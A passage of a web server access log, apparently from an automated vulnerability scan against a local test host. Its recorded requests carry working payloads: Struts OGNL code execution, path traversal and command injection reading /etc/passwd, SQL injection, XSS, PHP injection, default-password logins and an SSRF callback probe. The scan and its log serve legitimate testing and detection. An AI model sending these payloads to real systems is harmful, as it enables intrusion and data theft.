+0000","request_body":"name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Orion/Login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"loginUsername=admin&loginPassword=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /submitLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aqsm_remove_file_fd_question\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92\x0D\x0AContent-Disposition: form-data; name=\x22file_url\x22\x0D\x0A\x0D\x0A{{fullpath}}wp-content/plugins/quiz-master-next/README.md\x0D\x0A------WebKitFormBoundaryBJ17hSJBjuGrnW92--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /userportal/Controller?mode=8700&operation=1&datagrid=179&json={\x22\xF0\x9F\xA6\x9E\x22:\x22test\x22} HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\x22;user|s.\x221337\x22; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"Login=admin&Password=12345&Action=AdminLogin&XToken={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?/Ajax/&q[]=/0/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/resources/add_collection_ajaxprocessor.jsp?collectionName=%3Cimg%20src=x%20onerror=alert(document.domain)%3E&parentPath=%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?next=\x5C\x5C\x5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fpui/loginServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c9v8gc8smpv8b0ng0t00zghmyi6sjg35t.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/search/*:test=test HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /composer.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ALFA_DATA/alfacgiapi/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"Name=admin&Pass=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /manager/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"page=index');${system('echo lotuscms_rce | md5sum')};#\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lcms/index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /run 